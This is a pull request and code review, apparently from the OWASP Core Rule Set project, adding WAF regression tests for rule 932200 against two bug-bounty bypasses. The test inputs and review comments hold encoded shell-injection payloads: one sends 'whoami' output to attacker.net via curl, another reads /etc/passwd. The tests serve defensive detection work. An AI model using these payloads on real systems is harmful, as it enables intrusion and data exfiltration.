### PR TITLE
tests: add coverage for BB EBIDJ91T and MKXQCJMX

### PR DESCRIPTION
**Pull request by fzipi**
Signed-off-by: Felipe Zipitria <felipe.zipitria@owasp.org>

- adds test to prove coverage

### CODE REVIEW

File: tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml [hunk 1]
```diff
@@ -230,3 +230,39 @@ tests:
...
           output:
             log_contains: id "932200"
+  - test_title: 932200-15
+    desc: "Add test to match BB EBIDJ91T"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            data: |
+              a%3Dcurl%26%26b%3Dwhoami%26%26%24a%20attacker.net%2F%24b
```
Comment (theseion) [inline tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml:240]: Is literal style necessary here?

File: tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml [hunk 2]
```diff
@@ -230,3 +230,39 @@ tests:
...
+          output:
+            log_contains: id "932200"
+  - test_title: 932200-16
+    desc: "Add test to match BB MKXQCJMX"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            data: |
+              a%3D%2Fetc%26%26b%3D%2Fpasswd%26%26c%3Dcat%26%26%24c%20%24a%24b
```
Comment (theseion) [inline tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml:258]: Is literal style necessary here?

File: tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml (hunk 1 above)
Comment (fzipi) [reply tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml]: No. Removed.

File: tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml (hunk 2 above)
Comment (fzipi) [reply tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml]: Removed.

File: tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml [hunk 3]
```diff
@@ -230,3 +230,37 @@ tests:
             version: HTTP/1.0
           output:
             log_contains: id "932200"
+  - test_title: 932200-15
+    desc: "Add test to match BB EBIDJ91T"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            data: a%3Dcurl%26%26b%3Dwhoami%26%26%24a%20attacker.net%2F%24b
```
Comment (dune73) [inline tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml:239]: The original payload is 
```
code=a=curl&&b=\`whoami\`&&\$a example.com/\$b
```

Your payload is
```
a=curl&&b=whoami&&$a attacker.net/$b
```

Apparently enough to trigger, but why the diff?

File: tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml [hunk 4]
```diff
@@ -230,3 +230,37 @@ tests:
...
+            version: HTTP/1.0
+          output:
+            log_contains: id "932200"
+  - test_title: 932200-16
+    desc: "Add test to match BB MKXQCJMX"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            data: a%3D%2Fetc%26%26b%3D%2Fpasswd%26%26c%3Dcat%26%26%24c%20%24a%24b
```
Comment (dune73) [inline tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml:256]: Again a diff to the curl_1.sh payload. Why?

**Review by dune73 — CHANGES_REQUESTED** [review]

File: tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml (hunk 3 above)
Comment (fzipi) [reply tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml:239]: Don't know, maybe bad copy&paste? Changed to original payload.

File: tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml (hunk 4 above)
Comment (fzipi) [reply tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml]: No clue. Changed to original in report.

**Comment by dune73** [comment]
@fzipi I'm happy to give a positive review, but you still miss the backticks from the original payload.

**Comment by fzipi** [comment]
Copy and pasted now.

**Review by dune73 — APPROVED** [review]
Thank you. Works out now.

**Pull request merged**